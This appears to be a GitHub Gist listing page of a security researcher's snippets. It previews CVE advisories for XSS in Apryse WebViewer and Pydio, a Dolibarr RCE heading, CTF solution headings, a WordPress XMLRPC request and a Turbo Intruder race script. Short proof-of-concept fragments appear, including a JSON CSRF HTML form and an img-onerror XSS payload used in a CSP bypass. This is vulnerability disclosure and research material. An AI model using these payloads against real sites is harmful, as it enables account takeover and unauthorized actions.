@Xib3rR4dAr
Xib3rR4dAr / CVE-2024-57240_Apryse_WebViewer_XSS.md
Created March 13, 2025 09:53 — forked from devom3/CVE-2024-57240_Apryse_WebViewer_XSS.md
CVE-2024-57240: Cross-Site Scripting (XSS) Vulnerability in Apryse WebViewer <= 11.1

CVE-2024-57240: Cross-Site Scripting (XSS) Vulnerability in Apryse WebViewer ≤ 11.1

Date Published: Feb 24 2025

Summary

A Cross-Site Scripting (XSS) vulnerability has been identified in Apryse WebViewer versions up to and including 11.1. This vulnerability allows remote attackers to execute arbitrary JavaScript code by supplying a crafted PDF file. The issue arises due to improper sanitization of user-supplied input during PDF rendering.

Affected Product

@Xib3rR4dAr
Xib3rR4dAr / json_csrf.md
Created January 6, 2025 09:27
JSON CSRF

CSRF can be performed against JSON requests if other MIME types such as text/plain are supported, but the data structure must still be JSON.

PoC:

<html>
  <body>
    <form action="https://example.com/link-device.php" method="POST" enctype="text/plain">
      <input type="hidden" name='{"code":"BINGOOOOM","foo=' value='":""}' />
@Xib3rR4dAr
Xib3rR4dAr / burp_intruder_all_printable_ascii_characters_list.md
Last active April 22, 2025 19:09
Burp Intruder all printable ASCII characters list
@Xib3rR4dAr
Xib3rR4dAr / dolibarr_20.0.4_rce.md
Last active March 9, 2025 20:36
Dolibarr <= 20.0.4 RCE

Remote Code Execution (RCE) in Dolibarr <= 20.0.4

Description: Remote Code Execution (RCE) in Dolibarr
Versions Affected: <= 20.0.4
Date: December 22, 2024
Researcher: Muhammad Zeeshan (Xib3rR4dAr)
Product Link: https://www.dolibarr.org

Proof-of-Concept Exploit

@Xib3rR4dAr
Xib3rR4dAr / keycloak_angular_js_1.8.3_xss_csp_bypass.md
Created November 17, 2024 20:53
Keycloak AngularJS 1.8.3 XSS CSP bypass

blob://example.com/3dfab3bd-a892-4448-92c3-de92d8eed2ea

<img src=x onerror=alert(1)>
Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.

angular.min.js

@Xib3rR4dAr
Xib3rR4dAr / Pydio_Core_8.2.5_Stored_XSS_PoC.md
Last active April 22, 2025 19:09
CVE-2024-40124 Pydio Core <= 8.2.5 Stored XSS PoC

Pydio Core <= 8.2.5 Stored XSS PoC

Advisory Information

Author: Muhammad Zeeshan (Xib3rR4dAr)
CVE: CVE-2024-40124
Title: Pydio Core <= 8.2.5 Stored XSS
Date published: June 25, 2024
Impact: Execution of malicious JavaScript leading to account takeover and phishing attacks.

@Xib3rR4dAr
Xib3rR4dAr / phash_solution.md
Last active July 3, 2023 10:55
Solution of challenge "phash" from AUPCTF

phash

Challenge Name: phash
Challenge Text: login source
Initial Hint: No Hint
First Hint (when no one solved): Marvel characters (lowercased)
Second Hint: Who was the character that fans speculated would appear in a "Marvel Show" but ultimately did not make an appearance? (Third Hint was provided after first 🩸 was obtained by me)

Provided:
image

@Xib3rR4dAr
Xib3rR4dAr / conundrum_solution.md
Created June 26, 2023 19:38
Solution of challenge "conundrum" from AUPCTF
@Xib3rR4dAr
Xib3rR4dAr / wp_xmlrpc_reqs.md
Created November 24, 2022 10:40
WordPress XMLRPC
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 91
Content-Type: application/x-www-form-urlencoded

<methodCall>
<methodName>system.listMethods</methodName>
@Xib3rR4dAr
Xib3rR4dAr / burp-suite-turbo-intruder-race.py
Created February 23, 2022 06:02
Racing script for Turbo Intruder extension in Burp Suite.
# From https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race.py
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):